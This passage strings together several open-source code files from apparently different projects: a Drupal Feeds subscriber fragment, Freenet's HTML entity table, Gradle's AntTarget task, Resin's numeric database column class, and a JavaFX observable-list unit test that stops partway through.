$dispatcher->addListener(FeedsEvents::EXPIRE, function(ExpireEvent $event) {
$feed = $event->getFeed();
$state = $feed->getState(StateInterface::EXPIRE);
$feed->getType()
->getProcessor()
->expireItem($feed, $event->getItemId(), $state);
$feed->saveStates();
});
}
}
| marceliotstein/marcelio8 | web/modules/feeds/src/EventSubscriber/LazySubscriber.php | PHP | gpl-2.0 | 3,856 |
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
package freenet.support;
import java.util.HashMap;
/**
* Class that provides data structures filled with HTML Entities and correspondent char value
*
* @author Alberto Bacchelli <sback@freenetproject.org>
*/
public final class HTMLEntities {
/**
* a Map where the HTML Entity is the value and the correspondent char is the key
*/
public static final HashMap<Character, String> encodeMap;
/**
* a Map where the HTML Entity is the key and the correspondent char is the value
*/
public static final HashMap<String, Character> decodeMap;
private static final Object[][] charArray = {
{Character.valueOf((char)0), "#0"},
{Character.valueOf((char)34), "quot"},
{Character.valueOf((char)38), "amp"},
{Character.valueOf((char)39), "#39"},
{Character.valueOf((char)60), "lt"},
{Character.valueOf((char)62), "gt"},
{Character.valueOf((char)160), "nbsp"},
{Character.valueOf((char)161), "iexcl"},
{Character.valueOf((char)162), "cent"},
{Character.valueOf((char)163), "pound"},
{Character.valueOf((char)164), "curren"},
{Character.valueOf((char)165), "yen"},
{Character.valueOf((char)166), "brvbar"},
{Character.valueOf((char)167), "sect"},
{Character.valueOf((char)168), "uml"},
{Character.valueOf((char)169), "copy"},
{Character.valueOf((char)170), "ordf"},
{Character.valueOf((char)171), "laquo"},
{Character.valueOf((char)172), "not"},
{Character.valueOf((char)173), "shy"},
{Character.valueOf((char)174), "reg"},
{Character.valueOf((char)175), "macr"},
{Character.valueOf((char)176), "deg"},
{Character.valueOf((char)177), "plusmn"},
{Character.valueOf((char)178), "sup2"},
{Character.valueOf((char)179), "sup3"},
{Character.valueOf((char)180), "acute"},
{Character.valueOf((char)181), "micro"},
{Character.valueOf((char)182), "para"},
{Character.valueOf((char)183), "middot"},
{Character.valueOf((char)184), "cedil"},
{Character.valueOf((char)185), "sup1"},
{Character.valueOf((char)186), "ordm"},
{Character.valueOf((char)187), "raquo"},
{Character.valueOf((char)188), "frac14"},
{Character.valueOf((char)189), "frac12"},
{Character.valueOf((char)190), "frac34"},
{Character.valueOf((char)191), "iquest"},
{Character.valueOf((char)192), "Agrave"},
{Character.valueOf((char)193), "Aacute"},
{Character.valueOf((char)194), "Acirc"},
{Character.valueOf((char)195), "Atilde"},
{Character.valueOf((char)196), "Auml"},
{Character.valueOf((char)197), "Aring"},
{Character.valueOf((char)198), "AElig"},
{Character.valueOf((char)199), "Ccedil"},
{Character.valueOf((char)200), "Egrave"},
{Character.valueOf((char)201), "Eacute"},
{Character.valueOf((char)202), "Ecirc"},
{Character.valueOf((char)203), "Euml"},
{Character.valueOf((char)204), "Igrave"},
{Character.valueOf((char)205), "Iacute"},
{Character.valueOf((char)206), "Icirc"},
{Character.valueOf((char)207), "Iuml"},
{Character.valueOf((char)208), "ETH"},
{Character.valueOf((char)209), "Ntilde"},
{Character.valueOf((char)210), "Ograve"},
{Character.valueOf((char)211), "Oacute"},
{Character.valueOf((char)212), "Ocirc"},
{Character.valueOf((char)213), "Otilde"},
{Character.valueOf((char)214), "Ouml"},
{Character.valueOf((char)215), "times"},
{Character.valueOf((char)216), "Oslash"},
{Character.valueOf((char)217), "Ugrave"},
{Character.valueOf((char)218), "Uacute"},
{Character.valueOf((char)219), "Ucirc"},
{Character.valueOf((char)220), "Uuml"},
{Character.valueOf((char)221), "Yacute"},
{Character.valueOf((char)222), "THORN"},
{Character.valueOf((char)223), "szlig"},
{Character.valueOf((char)224), "agrave"},
{Character.valueOf((char)225), "aacute"},
{Character.valueOf((char)226), "acirc"},
{Character.valueOf((char)227), "atilde"},
{Character.valueOf((char)228), "auml"},
{Character.valueOf((char)229), "aring"},
{Character.valueOf((char)230), "aelig"},
{Character.valueOf((char)231), "ccedil"},
{Character.valueOf((char)232), "egrave"},
{Character.valueOf((char)233), "eacute"},
{Character.valueOf((char)234), "ecirc"},
{Character.valueOf((char)235), "euml"},
{Character.valueOf((char)236), "igrave"},
{Character.valueOf((char)237), "iacute"},
{Character.valueOf((char)238), "icirc"},
{Character.valueOf((char)239), "iuml"},
{Character.valueOf((char)240), "eth"},
{Character.valueOf((char)241), "ntilde"},
{Character.valueOf((char)242), "ograve"},
{Character.valueOf((char)243), "oacute"},
{Character.valueOf((char)244), "ocirc"},
{Character.valueOf((char)245), "otilde"},
{Character.valueOf((char)246), "ouml"},
{Character.valueOf((char)247), "divide"},
{Character.valueOf((char)248), "oslash"},
{Character.valueOf((char)249), "ugrave"},
{Character.valueOf((char)250), "uacute"},
{Character.valueOf((char)251), "ucirc"},
{Character.valueOf((char)252), "uuml"},
{Character.valueOf((char)253), "yacute"},
{Character.valueOf((char)254), "thorn"},
{Character.valueOf((char)255), "yuml"},
{Character.valueOf((char)260), "#260"},
{Character.valueOf((char)261), "#261"},
{Character.valueOf((char)262), "#262"},
{Character.valueOf((char)263), "#263"},
{Character.valueOf((char)280), "#280"},
{Character.valueOf((char)281), "#281"},
{Character.valueOf((char)321), "#321"},
{Character.valueOf((char)322), "#322"},
{Character.valueOf((char)323), "#323"},
{Character.valueOf((char)324), "#324"},
{Character.valueOf((char)338), "OElig"},
{Character.valueOf((char)339), "oelig"},
{Character.valueOf((char)346), "#346"},
{Character.valueOf((char)347), "#347"},
{Character.valueOf((char)352), "Scaron"},
{Character.valueOf((char)353), "scaron"},
{Character.valueOf((char)376), "Yuml"},
{Character.valueOf((char)377), "#377"},
{Character.valueOf((char)378), "#378"},
{Character.valueOf((char)379), "#379"},
{Character.valueOf((char)380), "#380"},
{Character.valueOf((char)402), "fnof"},
{Character.valueOf((char)710), "circ"},
{Character.valueOf((char)732), "tilde"},
{Character.valueOf((char)913), "Alpha"},
{Character.valueOf((char)914), "Beta"},
{Character.valueOf((char)915), "Gamma"},
{Character.valueOf((char)916), "Delta"},
{Character.valueOf((char)917), "Epsilon"},
{Character.valueOf((char)918), "Zeta"},
{Character.valueOf((char)919), "Eta"},
{Character.valueOf((char)920), "Theta"},
{Character.valueOf((char)921), "Iota"},
{Character.valueOf((char)922), "Kappa"},
{Character.valueOf((char)923), "Lambda"},
{Character.valueOf((char)924), "Mu"},
{Character.valueOf((char)925), "Nu"},
{Character.valueOf((char)926), "Xi"},
{Character.valueOf((char)927), "Omicron"},
{Character.valueOf((char)928), "Pi"},
{Character.valueOf((char)929), "Rho"},
{Character.valueOf((char)931), "Sigma"},
{Character.valueOf((char)932), "Tau"},
{Character.valueOf((char)933), "Upsilon"},
{Character.valueOf((char)934), "Phi"},
{Character.valueOf((char)935), "Chi"},
{Character.valueOf((char)936), "Psi"},
{Character.valueOf((char)937), "Omega"},
{Character.valueOf((char)945), "alpha"},
{Character.valueOf((char)946), "beta"},
{Character.valueOf((char)947), "gamma"},
{Character.valueOf((char)948), "delta"},
{Character.valueOf((char)949), "epsilon"},
{Character.valueOf((char)950), "zeta"},
{Character.valueOf((char)951), "eta"},
{Character.valueOf((char)952), "theta"},
{Character.valueOf((char)953), "iota"},
{Character.valueOf((char)954), "kappa"},
{Character.valueOf((char)955), "lambda"},
{Character.valueOf((char)956), "mu"},
{Character.valueOf((char)957), "nu"},
{Character.valueOf((char)958), "xi"},
{Character.valueOf((char)959), "omicron"},
{Character.valueOf((char)960), "pi"},
{Character.valueOf((char)961), "rho"},
{Character.valueOf((char)962), "sigmaf"},
{Character.valueOf((char)963), "sigma"},
{Character.valueOf((char)964), "tau"},
{Character.valueOf((char)965), "upsilon"},
{Character.valueOf((char)966), "phi"},
{Character.valueOf((char)967), "chi"},
{Character.valueOf((char)968), "psi"},
{Character.valueOf((char)969), "omega"},
{Character.valueOf((char)977), "thetasym"},
{Character.valueOf((char)978), "upsih"},
{Character.valueOf((char)982), "piv"},
{Character.valueOf((char)8194), "ensp"},
{Character.valueOf((char)8195), "emsp"},
{Character.valueOf((char)8201), "thinsp"},
{Character.valueOf((char)8204), "zwnj"},
{Character.valueOf((char)8205), "zwj"},
{Character.valueOf((char)8206), "lrm"},
{Character.valueOf((char)8207), "rlm"},
{Character.valueOf((char)8211), "ndash"},
{Character.valueOf((char)8212), "mdash"},
{Character.valueOf((char)8216), "lsquo"},
{Character.valueOf((char)8217), "rsquo"},
{Character.valueOf((char)8218), "sbquo"},
{Character.valueOf((char)8220), "ldquo"},
{Character.valueOf((char)8221), "rdquo"},
{Character.valueOf((char)8222), "bdquo"},
{Character.valueOf((char)8224), "dagger"},
{Character.valueOf((char)8225), "Dagger"},
{Character.valueOf((char)8226), "bull"},
{Character.valueOf((char)8230), "hellip"},
{Character.valueOf((char)8240), "permil"},
{Character.valueOf((char)8242), "prime"},
{Character.valueOf((char)8243), "Prime"},
{Character.valueOf((char)8249), "lsaquo"},
{Character.valueOf((char)8250), "rsaquo"},
{Character.valueOf((char)8254), "oline"},
{Character.valueOf((char)8260), "frasl"},
{Character.valueOf((char)8364), "euro"},
{Character.valueOf((char)8465), "image"},
{Character.valueOf((char)8472), "weierp"},
{Character.valueOf((char)8476), "real"},
{Character.valueOf((char)8482), "trade"},
{Character.valueOf((char)8501), "alefsym"},
{Character.valueOf((char)8592), "larr"},
{Character.valueOf((char)8593), "uarr"},
{Character.valueOf((char)8594), "rarr"},
{Character.valueOf((char)8595), "darr"},
{Character.valueOf((char)8596), "harr"},
{Character.valueOf((char)8629), "crarr"},
{Character.valueOf((char)8656), "lArr"},
{Character.valueOf((char)8657), "uArr"},
{Character.valueOf((char)8658), "rArr"},
{Character.valueOf((char)8659), "dArr"},
{Character.valueOf((char)8660), "hArr"},
{Character.valueOf((char)8704), "forall"},
{Character.valueOf((char)8706), "part"},
{Character.valueOf((char)8707), "exist"},
{Character.valueOf((char)8709), "empty"},
{Character.valueOf((char)8711), "nabla"},
{Character.valueOf((char)8712), "isin"},
{Character.valueOf((char)8713), "notin"},
{Character.valueOf((char)8715), "ni"},
{Character.valueOf((char)8719), "prod"},
{Character.valueOf((char)8721), "sum"},
{Character.valueOf((char)8722), "minus"},
{Character.valueOf((char)8727), "lowast"},
{Character.valueOf((char)8730), "radic"},
{Character.valueOf((char)8733), "prop"},
{Character.valueOf((char)8734), "infin"},
{Character.valueOf((char)8736), "ang"},
{Character.valueOf((char)8743), "and"},
{Character.valueOf((char)8744), "or"},
{Character.valueOf((char)8745), "cap"},
{Character.valueOf((char)8746), "cup"},
{Character.valueOf((char)8747), "int"},
{Character.valueOf((char)8756), "there4"},
{Character.valueOf((char)8764), "sim"},
{Character.valueOf((char)8773), "cong"},
{Character.valueOf((char)8776), "asymp"},
{Character.valueOf((char)8800), "ne"},
{Character.valueOf((char)8801), "equiv"},
{Character.valueOf((char)8804), "le"},
{Character.valueOf((char)8805), "ge"},
{Character.valueOf((char)8834), "sub"},
{Character.valueOf((char)8835), "sup"},
{Character.valueOf((char)8836), "nsub"},
{Character.valueOf((char)8838), "sube"},
{Character.valueOf((char)8839), "supe"},
{Character.valueOf((char)8853), "oplus"},
{Character.valueOf((char)8855), "otimes"},
{Character.valueOf((char)8869), "perp"},
{Character.valueOf((char)8901), "sdot"},
{Character.valueOf((char)8968), "lceil"},
{Character.valueOf((char)8969), "rceil"},
{Character.valueOf((char)8970), "lfloor"},
{Character.valueOf((char)8971), "rfloor"},
{Character.valueOf((char)9001), "lang"},
{Character.valueOf((char)9002), "rang"},
{Character.valueOf((char)9674), "loz"},
{Character.valueOf((char)9824), "spades"},
{Character.valueOf((char)9827), "clubs"},
{Character.valueOf((char)9829), "hearts"},
{Character.valueOf((char)9830), "diams"}
};
static {
encodeMap = new HashMap<Character, String>();
decodeMap = new HashMap<String, Character>();
for(int i=0; i<charArray.length; i++) {
encodeMap.put((Character) charArray[i][0], (String) charArray[i][1]);
decodeMap.put((String) charArray[i][1], (Character) charArray[i][0]);
}
}
}
| saces/fred | src/freenet/support/HTMLEntities.java | Java | gpl-2.0 | 13,226 |
/*
* Copyright 2009 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.gradle.api.tasks.ant;
import org.apache.tools.ant.Target;
import org.gradle.api.internal.ConventionTask;
import org.gradle.api.tasks.TaskAction;
import java.io.File;
/**
* A task which executes an Ant target.
*/
public class AntTarget extends ConventionTask {
private Target target;
private File baseDir;
@TaskAction
protected void executeAntTarget() {
File oldBaseDir = target.getProject().getBaseDir();
target.getProject().setBaseDir(baseDir);
try {
target.performTasks();
} finally {
target.getProject().setBaseDir(oldBaseDir);
}
}
/**
* Returns the Ant target to execute.
*/
public Target getTarget() {
return target;
}
/**
* Sets the Ant target to execute.
*/
public void setTarget(Target target) {
this.target = target;
}
/**
* Returns the Ant project base directory to use when executing the target.
*/
public File getBaseDir() {
return baseDir;
}
/**
* Sets the Ant project base directory to use when executing the target.
*/
public void setBaseDir(File baseDir) {
this.baseDir = baseDir;
}
/**
* {@inheritDoc}
*/
@Override
public String getDescription() {
return target == null ? null : target.getDescription();
}
/**
* {@inheritDoc}
*/
@Override
public void setDescription(String description) {
if (target != null) {
target.setDescription(description);
}
}
}
| cams7/gradle-samples | plugin/core/src/main/groovy/org/gradle/api/tasks/ant/AntTarget.java | Java | gpl-2.0 | 2,203 |
/*
* Copyright (c) 1998-2012 Caucho Technology -- all rights reserved
*
* This file is part of Resin(R) Open Source
*
* Each copy or derived work must preserve the copyright notice and this
* notice unmodified.
*
* Resin Open Source is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* Resin Open Source is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE, or any warranty
* of NON-INFRINGEMENT. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License
* along with Resin Open Source; if not, write to the
* Free SoftwareFoundation, Inc.
* 59 Temple Place, Suite 330
* Boston, MA 02111-1307 USA
*
* @author Scott Ferguson
*/
package com.caucho.db.table;
import com.caucho.db.index.BTree;
import com.caucho.db.sql.Expr;
import com.caucho.db.sql.QueryContext;
import com.caucho.db.sql.SelectResult;
import com.caucho.db.xa.DbTransaction;
import com.caucho.util.CharBuffer;
import java.sql.SQLException;
/**
* Represents a numeric column.
*/
class NumericColumn extends Column {
private int _precision;
private int _scale;
private long _offset;
/**
* Creates a date column.
*
* @param row the row the column is being added to
* @param name the column's name
*/
NumericColumn(Row row, String name, int precision, int scale)
{
super(row, name);
_precision = precision;
_scale = scale;
_offset = 1;
for (int i = 0; i < scale; i++)
_offset *= 10;
}
/**
* Returns the column's type code.
*/
@Override
public ColumnType getTypeCode()
{
return ColumnType.NUMERIC;
}
/**
* Returns the precision.
*/
public int getPrecision()
{
return _precision;
}
/**
* Returns the scale.
*/
public int getScale()
{
return _scale;
}
/**
* Returns the column's Java type.
*/
@Override
public Class<?> getJavaType()
{
return double.class;
}
/**
* Returns the column's declaration size.
*/
@Override
public int getDeclarationSize()
{
return 8;
}
/**
* Returns the column's length
*/
@Override
public int getLength()
{
return 8;
}
/**
* Sets a string value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
@Override
void setString(DbTransaction xa, byte []block, int rowOffset, String str)
throws SQLException
{
if (str == null || str.length() == 0)
setNull(block, rowOffset);
else
setDouble(xa, block, rowOffset, Double.parseDouble(str));
}
/**
* Gets a string value from the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
*/
@Override
public String getString(long blockId, byte []block, int rowOffset)
throws SQLException
{
if (isNull(block, rowOffset))
return null;
else {
long value = getNumeric(block, rowOffset);
CharBuffer cb = new CharBuffer();
long head = value / _offset;
long tail = value % _offset;
cb.append(head);
cb.append('.');
cb.append(tail);
return cb.toString();
}
}
/**
* Sets a double value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
@Override
public void setDouble(DbTransaction xa, byte []block, int rowOffset, double v)
throws SQLException
{
setNumeric(xa, block, rowOffset, (long) (v * _offset + 0.5));
}
/**
* Sets a double value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
@Override
public double getDouble(long blockId, byte []block, int rowOffset)
throws SQLException
{
return (double) getNumeric(block, rowOffset) / _offset;
}
/**
* Evaluates the column to a stream.
*/
@Override
public void evalToResult(long blockId, byte []block, int rowOffset,
SelectResult result)
throws SQLException
{
if (isNull(block, rowOffset)) {
result.writeNull();
return;
}
result.writeString(getString(blockId, block, rowOffset));
}
/**
* Evaluate to a buffer.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param buffer the result buffer
* @param buffer the result buffer offset
*
* @return the length of the value
*/
@Override
int evalToBuffer(byte []block, int rowOffset,
byte []buffer, int bufferOffset)
throws SQLException
{
if (isNull(block, rowOffset))
return 0;
int startOffset = rowOffset + _columnOffset;
int len = 8;
System.arraycopy(block, startOffset, buffer, bufferOffset, len);
return len;
}
/**
* Sets the column based on an expression.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param expr the expression to store
*/
@Override
void setExpr(DbTransaction xa,
byte []block, int rowOffset,
Expr expr, QueryContext context)
throws SQLException
{
if (expr.isNull(null))
setNull(block, rowOffset);
else
setDouble(xa, block, rowOffset, expr.evalDouble(context));
}
/**
* Returns true if the items in the given rows match.
*/
@Override
public boolean isEqual(byte []block1, int rowOffset1,
byte []block2, int rowOffset2)
{
if (isNull(block1, rowOffset1) != isNull(block2, rowOffset2))
return false;
int startOffset1 = rowOffset1 + _columnOffset;
int startOffset2 = rowOffset2 + _columnOffset;
return (block1[startOffset1 + 0] == block2[startOffset2 + 0] &&
block1[startOffset1 + 1] == block2[startOffset2 + 1] &&
block1[startOffset1 + 2] == block2[startOffset2 + 2] &&
block1[startOffset1 + 3] == block2[startOffset2 + 3] &&
block1[startOffset1 + 4] == block2[startOffset2 + 4] &&
block1[startOffset1 + 5] == block2[startOffset2 + 5] &&
block1[startOffset1 + 6] == block2[startOffset2 + 6] &&
block1[startOffset1 + 7] == block2[startOffset2 + 7]);
}
/**
* Sets any index for the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param rowAddr the address of the row
*/
@Override
void setIndex(DbTransaction xa,
byte []block, int rowOffset,
long rowAddr, QueryContext context)
throws SQLException
{
BTree index = getIndex();
if (index == null)
return;
index.insert(block, rowOffset + _columnOffset, 8, rowAddr, false);
}
/**
* Sets based on an iterator.
*/
public void set(TableIterator iter, Expr expr, QueryContext context)
throws SQLException
{
iter.setDirty();
setDouble(iter.getTransaction(), iter.getBuffer(), iter.getRowOffset(),
expr.evalDouble(context));
}
/**
* Deleting the row, based on the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param expr the expression to store
*/
@Override
void deleteIndex(DbTransaction xa, byte []block, int rowOffset)
throws SQLException
{
BTree index = getIndex();
if (index != null)
index.remove(block, rowOffset + _columnOffset, 8);
}
/**
* Sets a numeric value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
void setNumeric(DbTransaction xa, byte []block, int rowOffset, long value)
{
int offset = rowOffset + _columnOffset;
block[offset++] = (byte) (value >> 56);
block[offset++] = (byte) (value >> 48);
block[offset++] = (byte) (value >> 40);
block[offset++] = (byte) (value >> 32);
block[offset++] = (byte) (value >> 24);
block[offset++] = (byte) (value >> 16);
block[offset++] = (byte) (value >> 8);
block[offset++] = (byte) (value);
setNonNull(block, rowOffset);
}
/**
* Gets a long value from the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
*/
long getNumeric(byte []block, int rowOffset)
{
if (isNull(block, rowOffset))
return 0;
int offset = rowOffset + _columnOffset;
long value = 0;
value = (block[offset++] & 0xffL) << 56;
value |= (block[offset++] & 0xffL) << 48;
value |= (block[offset++] & 0xffL) << 40;
value |= (block[offset++] & 0xffL) << 32;
value |= (block[offset++] & 0xffL) << 24;
value |= (block[offset++] & 0xffL) << 16;
value |= (block[offset++] & 0xffL) << 8;
value |= (block[offset++] & 0xffL);
return value;
}
}
| WelcomeHUME/svn-caucho-com-resin | modules/resin/src/com/caucho/db/table/NumericColumn.java | Java | gpl-2.0 | 9,344 |
/*
* Copyright (c) 2011, 2014, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package javafx.collections;
import com.sun.javafx.collections.VetoableListDecorator;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.ConcurrentModificationException;
import java.util.Iterator;
import java.util.List;
import java.util.ListIterator;
import org.junit.Before;
import org.junit.Ignore;
import org.junit.Test;
import static org.junit.Assert.*;
/**
*
*/
public class VetoableObservableListTest {
private static class Call {
public Call(List<String> added, int[] removed) {
this.added = added;
this.removed = removed;
}
int[] removed;
List<String> added;
}
ObservableList<String> list;
List<Call> calls;
private void assertCallCount(int count) {
assertEquals(count, calls.size());
}
private void assertCall(int number, String[] added, int[] removed) {
Call c = calls.get(number);
assertArrayEquals(removed, c.removed);
assertArrayEquals(added, c.added.toArray(new String[0]));
}
private void assertSingleCall(String[] added, int[] removed) {
assertCallCount(1);
assertCall(0, added, removed);
}
@Before
public void setUp() {
calls = new ArrayList<Call>();
list = new VetoableListDecorator<String>(FXCollections.<String>observableArrayList()) {
@Override
protected void onProposedChange(List<String> added, int[] removed) {
calls.add(new Call(added, removed));
}
};
list.addAll("foo", "bar", "ham", "eggs");
calls.clear();
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_add() {
list.add(null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_add_indexed() {
list.add( 1, null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_addAll_collection() {
list.addAll(Arrays.asList("a", null, "b"));
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_addAll() {
list.addAll("a", null, "b");
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_addAll_collection_indexed() {
list.addAll(1, Arrays.asList("a", null, "b"));
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_set() {
list.set(1, null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_setAll() {
list.setAll("a", null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_setAll_collection() {
list.setAll(Arrays.asList("a", null, "b"));
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_listIterator_add() {
list.listIterator().add(null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_listIterator_set() {
ListIterator<String> it = list.listIterator();
it.next();
it.set(null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_subList_add() {
list.subList(0, 1).add(null);
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_add_indexed() {
list.subList(0, 1).add(0, null);
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_addAll() {
list.subList(0, 1).addAll(Collections.<String>singleton(null));
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_addAll_indexed() {
list.subList(0, 1).addAll(0, Collections.<String>singleton(null));
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_set() {
list.subList(0, 1).set(0, null);
}
@Test(expected = NullPointerException.class)
@Ignore
public void testNull_subList_listIterator() {
list.subList(0, 1).listIterator().add(null);
}
@Test
public void testAdd() {
list.add("a");
assertSingleCall(new String[] {"a"}, new int[] {4,4});
}
@Test
public void testAdd_indexed() {
list.add(1, "a");
assertSingleCall(new String[] {"a"}, new int[] {1,1});
}
@Test
public void testAddAll() {
list.addAll("a", "b");
assertSingleCall(new String[] {"a", "b"}, new int[] {4,4});
}
@Test
public void testAddAll_indexed() {
list.addAll(1, Arrays.asList("a", "b"));
assertSingleCall(new String[] {"a", "b"}, new int[] {1,1});
}
@Test
public void testClear() {
list.clear();
assertSingleCall(new String[0], new int[] {0,4});
}
@Test
public void testRemove() {
list.remove("bar");
assertSingleCall(new String[0], new int[] {1,2});
}
@Test
public void testRemove_indexed() {
list.remove(0);
assertSingleCall(new String[0], new int[] {0,1});
}
@Test
public void testRemoveAll() {
list.removeAll(Arrays.asList("bar", "eggs", "foobar"));
assertSingleCall(new String[0], new int[] {1,2,3,4});
}
@Test
public void testRetainAll() {
list.retainAll(Arrays.asList("foo", "barfoo", "ham"));
assertSingleCall(new String[0], new int[] {1,2,3,4});
}
@Test
public void testSet() {
list.set(1, "foobar");
assertSingleCall(new String[] {"foobar"}, new int[] {1,2});
}
@Test
public void testSetAll() {
list.setAll("a", "b");
assertSingleCall(new String[] {"a", "b"}, new int[] {0, 4});
}
@Test
public void testIterator_remove() {
final Iterator<String> iterator = list.iterator();
iterator.next();
iterator.remove();
assertSingleCall(new String[0], new int[] {0,1});
}
@Test
public void testListIterator_add() {
list.listIterator().add("a");
assertSingleCall(new String[] {"a"}, new int[] {0,0});
}
@Test
public void testListIterator_set() {
final ListIterator<String> listIterator = list.listIterator();
listIterator.next();
listIterator.set("a");
assertSingleCall(new String[] {"a"}, new int[] {0,1});
}
@Test
public void testSubList_add() {
list.subList(0, 1).add("b");
assertSingleCall(new String[] {"b"}, new int[] {1,1});
}
@Test
public void testSubList_addAll() {
list.subList(0, 1).addAll(Arrays.asList("a", "b"));
assertSingleCall(new String[] {"a", "b"}, new int[] {1,1});
}
@Test
public void testSubList_clear() {
list.subList(0, 1).clear();
assertSingleCall(new String[0], new int[] {0, 1});
}
@Test
public void testSubList_remove() {
list.subList(0, 1).remove(0);
assertSingleCall(new String[0], new int[] {0, 1});
}
@Test
public void testSubList_removeAll() {
list.subList(0, 1).removeAll(Arrays.asList("foo", "bar"));
assertSingleCall(new String[0], new int[] {0, 1});
}
@Test
public void testSubList_retainAll() {
list.subList(0, 1).retainAll(Arrays.asList("foo", "bar"));
assert(calls.isEmpty());
}
@Test
public void testSubList_set() {
list.subList(0, 1).set(0, "a");
assertSingleCall(new String[] {"a"}, new int[] {0,1});
}
@Test
public void testSubList_iterator_quicktest() {
final ListIterator<String> iterator = list.subList(0, 1).listIterator();
iterator.next();
iterator.remove();
iterator.add("a");
iterator.previous();
iterator.set("b");
assertCallCount(3);
assertCall(0, new String[0], new int[] {0, 1});
assertCall(1, new String[] {"a"}, new int[] {0, 0});
assertCall(2, new String[] {"b"}, new int[] {0, 1});
}
@Test
public void testConcurrencyAdd() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.add("y");
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyAddAll() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.addAll(Arrays.asList("y", "z"));
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyClear() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.clear();
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyRemove() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.remove("foo");
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyRemoveAll() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.removeAll(Arrays.asList("x"));
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyRetainAll() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.retainAll(Arrays.asList("x"));
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencySet() {
boolean exception = false;
List<String> sub = list.subList(0, 1);
list.add("x");
assertCallCount(1);
try {
sub.set(0, "z");
fail();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyIteratorRemove() {
boolean exception = false;
ListIterator<String> it = list.listIterator();
it.next();
list.add("x");
assertCallCount(1);
